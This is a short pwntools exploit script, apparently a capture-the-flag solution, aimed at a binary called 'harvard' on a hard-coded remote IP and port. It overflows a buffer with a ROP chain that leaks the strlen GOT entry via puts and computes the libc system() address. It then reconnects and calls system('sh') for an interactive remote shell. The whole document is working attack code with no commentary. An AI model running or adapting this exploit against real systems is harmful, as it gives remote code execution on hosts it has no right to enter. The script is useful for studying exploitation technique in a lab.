from pwn import *
HOST, PORT = '52.1.91.215', 2114
elf = ELF('har/harvard')
strlen_got = elf.got['strlen']
def preproc(r):
r.recvuntil(";-) : ")
r.send('AAAAAAAABBBBBBBBCCCCCCCC' + p64(0x4017df) + "DDDDDDD" + "\n")
r.recvuntil("Sleep\n")
r.send('1\n')
r.recvuntil("Windows\n")
r.send('1\n')
r.recvuntil("buy?\n")
r.send('1\n')
r.recvuntil("Sleep\n")
r.send('4\n')
r.recvuntil("Brookline) ")
r.send('1\n')
# leak address
r = remote(HOST, PORT)
preproc(r)
payload = 'A'* 280
payload += p64(0x0000000000402fc3) # pop rdi; ret
payload += p64( strlen_got ) # GOT of strlen
payload += p64( 0x00000000004024ec ) # puts
payload = payload + ("A"*(399-len(payload)))
r.send(payload + '\n')
r.recvuntil('\n')
r.recvuntil('!\n')
leak = r.recv()[:-1] + '\x00\x00'
leak = u64(leak)
system_address = leak - 0x0000000000089650 + 0x0000000000046640
print 'get system address: 0x%016x' % system_address
# run system
r = remote(HOST, PORT)
preproc(r)
payload = 'A'* 280
payload += p64( 0x0000000000402fc3 ) # pop rdi; ret
payload += p64( 0x4006be ) # sh
payload += p64( system_address ) # system
payload = payload + ("A"*(399-len(payload)))
r.send(payload + '\n')
r.interactive()